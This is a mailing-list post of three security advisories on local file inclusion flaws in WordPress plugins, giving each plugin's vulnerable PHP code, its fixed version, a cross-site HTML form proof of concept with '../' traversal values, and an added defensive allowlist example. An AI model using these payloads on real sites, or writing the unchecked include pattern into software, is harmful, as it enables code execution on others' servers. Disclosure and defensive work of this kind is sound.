Date: Sun, 17 Jul 2016 10:03:11 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple Local File Inclusion vulnerabilities affecting three WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.

------------------------------------------------------------------------
Easy Forms for MailChimp Local File Inclusion vulnerability
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Easy Forms for MailChimp WordPress plugin is
vulnerable to Local File Inclusion. This issue can potentially be
exploited to run arbitrary PHP code. In order to do so, the attacker
must be able to place an arbitrary PHP file on the target system. The
malicious file must have the .php extension.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0023

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Easy Forms for MailChimp [2]
WordPress Plugin version 6.0.5.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Easy Forms for MailChimp 6.1 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Easy Forms for MailChimp [2] WordPress Plugin allows adding
unlimited MailChimp sign up forms to a WordPress site. It is possible to
add forms to posts, pages, sidebars and other widgetized areas. A Local
File Inclusion vulnerability exists in the Easy Forms for MailChimp
WordPress plugin. This issue can potentially be exploited to run
arbitrary PHP code. In order to do so, the attacker must be able to
place an arbitrary PHP file on the target system. The malicious file
must have the .php extension.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file /admin/partials/menu/options.php and is
caused by the lack of input validation on the section request parameter.
The parameter value is concatenated directly into an include path, with
only the .php suffix appended, so a value containing ../ sequences
selects any .php file reachable from the options-sections directory.
The vulnerable code is listed below.

<?php
if ( !isset( $_REQUEST['section'] ) || $_REQUEST['section'] == '' ) {
    include YIKES_MC_PATH . 'admin/partials/menu/options-sections/general-settings.php';
} else {
    if ( isset( $_REQUEST['addon'] ) && $_REQUEST['addon'] == 'true' ) {
        include apply_filters( 'yikes-mailchimp-' . $_REQUEST['section'] . '-options-path', '' );
    } else {
        // $_REQUEST['section'] reaches include unchecked; only '.php' is appended
        include YIKES_MC_PATH . 'admin/partials/menu/options-sections/' . $_REQUEST['section'] . '.php';
    }
}
?>

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
Submitting the form below includes admin/partials/edit-form.php
(options-sections/../../edit-form.php relative to the plugin directory),
demonstrating the traversal with a file that ships with the plugin.

<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=yikes-inc-easy-mailchimp-settings" method="POST">
			<input type="hidden" name="section" value="../../edit-form" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/easy_forms_for_mailchimp_local_file_inclusion_vulnerability.html
[2] https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/
[3] https://downloads.wordpress.org/plugin/yikes-inc-easy-mailchimp-extender.6.1.zip
------------------------------------------------------------------------
Ultimate Member Local File Inclusion vulnerability
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that Ultimate Member [2] is vulnerable to PHP File
Inclusion [3]. In order to exploit this issue an attacker must be able
to place an arbitrary PHP file on the target system. Afterwards the
attacker needs to lure an authenticated admin to visit a malicious page.
Through CSRF the attacker can then have WordPress include and execute
the malicious PHP file, compromising the site.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0011

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Ultimate Member [2] WordPress
plugin version 1.3.64.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
A fix is available in the pre-release version pre-v1.3.65.10 [4]. After
the fix is applied, user input is no longer used when including local
files.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
A File Inclusion vulnerability allows an attacker to include a file of
their choosing by abusing a "dynamic file inclusion" mechanism
implemented in the Ultimate Member WordPress plugin.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability is caused by the use of the user-supplied 'page'
parameter without proper validation. The code first checks whether the
page parameter contains 'ultimatemember-' (strstr() only requires the
substring to appear somewhere in the value). If it does, the code strips
that prefix and uses the remainder as the template name, which is
concatenated into a path and passed to include_once [5]. The
file_exists() check does not prevent the attack: it only requires that
the target file exists, and a ../ sequence in the template name escapes
the welcome/ directory.

ultimate-member/admin/core/um-admin-dashboard.php:

$page = $_REQUEST['page'];
[..]
else if ( strstr( $page, 'ultimatemember-' ) ) {
    // prefix is stripped, the remainder is used as a path component
    $template = str_replace( 'ultimatemember-', '', $page );
    $file = um_path . 'admin/templates/welcome/' . $template . '.php';
    if ( file_exists( $file ) ) {
        include_once um_path . 'admin/templates/welcome/' . $template . '.php';
    }
}
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The proof of concept below simply includes a file from the Ultimate
Member temp folder under the WordPress uploads directory.

<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=ultimatemember" method="POST">
			<input type="hidden" name="page" value="ultimatemember-../../../../../uploads/ultimatemember/temp/dZm2Sr1IbnIy4Ikn3FbWdMlOh2wCzDu3KunD4tIk/stream_photo_697d3db4eba7e7254670210e3c095022_5779a47985512" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/ultimate_member_local_file_inclusion_vulnerability.html
[2] https://wordpress.org/plugins/ultimate-member/
[3] https://www.owasp.org/index.php/PHP_File_Inclusion
[4] https://github.com/ultimatemember/ultimatemember/commit/50f5828ac7fa08a1afa0a52b456a1db49071c804
[5] http://php.net/manual/en/function.include-once.php
------------------------------------------------------------------------
WP Fastest Cache Member Local File Inclusion vulnerability
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the WP Fastest Cache WordPress plugin is
vulnerable to Local File Inclusion. This issue can potentially be
exploited to run arbitrary PHP code. In order to do so, the attacker
must be able to place an arbitrary PHP file on the target system. The
malicious file must have the .php extension.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0022

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP Fastest Cache [2] WordPress
Plugin version 0.8.5.9.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WP Fastest Cache version 0.8.6.0 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WP Fastest Cache [2] WordPress Plugin creates static HTML files from
a dynamic WordPress blog. Rendering a page normally requires PHP and
MySQL, and therefore RAM and CPU; when many visitors hit the site at
once this load makes pages render slowly. A cache system avoids
rendering the same page again and again: it generates a static HTML file
once and serves that file to subsequent visitors. A Local File Inclusion
vulnerability exists in the WP Fastest Cache WordPress plugin. This
issue can potentially be exploited to run arbitrary PHP code. In order
to do so, the attacker must be able to place an arbitrary PHP file on
the target system. The malicious file must have the .php extension.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file wpFastestCache.php and is caused by the
lack of input validation on the id POST parameter of the
wpfc_cdn_template_ajax_request AJAX action. The current_user_can(
'manage_options') check restricts the call to administrators, but no
nonce is verified before the include, so the request can also be
triggered cross-site from an authenticated administrator's browser, as
the proof of concept below does. The vulnerable code is listed below.

public function wpfc_cdn_template_ajax_request_callback(){
    if(current_user_can('manage_options')){
        ob_start();
        // $_POST["id"] is concatenated into the include path unchecked
        include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php");
        $content = ob_get_contents();
        ob_end_clean();

[...]
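
The three Details sections above describe the same flaw: a request
parameter (section, page or id) is concatenated into an include path
with only a .php suffix appended, and neither a file_exists() check nor
a prefix match stops a ../ sequence from leaving the intended template
directory. The following is an added example written for this page, not
code from Easy Forms for MailChimp, Ultimate Member or WP Fastest Cache,
showing how such a template dispatch can be written so that the
proof-of-concept values above are rejected. The function name
resolve_template, the allowlist contents and the throwaway temporary
directory the script creates are assumptions made for the demo.

```php
<?php
// Added example for this page, not code from any of the three plugins.
// Function name, allowlist contents and the temporary directory layout
// are assumptions made for the demo.
declare(strict_types=1);

/**
 * Map a user-supplied template name to a file inside $base_dir, or
 * return null. Two independent checks:
 *   1. $name must be one of the fixed allowlist entries, so only
 *      templates the plugin ships can be selected (sufficient on its own).
 *   2. Defence in depth: after realpath() has collapsed any "../", the
 *      result must still lie strictly below $base_dir. This catches an
 *      allowlist entry that was mistakenly written with a path separator.
 */
function resolve_template(string $base_dir, string $name, array $allowed): ?string
{
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    $base = realpath($base_dir);
    $file = realpath($base_dir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $file === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

// Build a throwaway directory tree so the script runs anywhere:
//   $root/options-sections/general-settings.php   (legitimate template)
//   $root/edit-form.php                            (reachable with "../")
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi-demo-' . bin2hex(random_bytes(4));
$templates = $root . DIRECTORY_SEPARATOR . 'options-sections';
mkdir($templates, 0700, true);
file_put_contents($templates . '/general-settings.php', "<?php echo 'general settings';\n");
file_put_contents($root . '/edit-form.php', "<?php echo 'must never be included';\n");

$good_allowlist   = ['general-settings', 'api-settings'];  // assumed contents
$sloppy_allowlist = ['general-settings', '../edit-form'];  // deliberately wrong

// input => whether it must be accepted
$cases = [
    'general-settings'   => true,
    '../edit-form'       => false,  // the traversal shape used by the PoCs above
    'general-settings/.' => false,  // exists on disk but is not an allowlist entry
    ''                   => false,  // empty value: no silent default template
];

foreach (['allowlist' => $good_allowlist, 'sloppy allowlist' => $sloppy_allowlist] as $label => $allowed) {
    echo "== $label ==\n";
    foreach ($cases as $input => $must_accept) {
        $resolved = resolve_template($templates, $input, $allowed);
        printf("%-20s -> %s\n", var_export($input, true), $resolved ?? 'rejected');
        // With the sloppy list, '../edit-form' passes check 1 but fails check 2.
        assert(($resolved !== null) === $must_accept);
    }
}

// Remove the throwaway files.
unlink($templates . '/general-settings.php');
unlink($root . '/edit-form.php');
rmdir($templates);
rmdir($root);
```

Run it with php on the command line; each case prints either the
resolved absolute path or "rejected". The allowlist alone is sufficient;
the realpath() containment check is defence in depth that catches a bad
allowlist entry, as the second run shows. In a WordPress handler such as
the wpfc_cdn_template_ajax_request callback, the call would sit after
both current_user_can('manage_options') and a check_ajax_referer()
nonce check, so that a cross-site form like the proof of concept cannot
trigger it through an administrator's browser.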

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
Submitting the form below includes templates/exclude.php
(templates/cdn/../exclude.php relative to the plugin directory),
demonstrating the traversal with a file that ships with the plugin.

<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />
			<input type="hidden" name="id" value="../exclude" />
			<input type="submit" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/wp_fastest_cache_member_local_file_inclusion_vulnerability.html
[2] https://wordpress.org/plugins/wp-fastest-cache/
[3] https://downloads.wordpress.org/plugin/wp-fastest-cache.zip
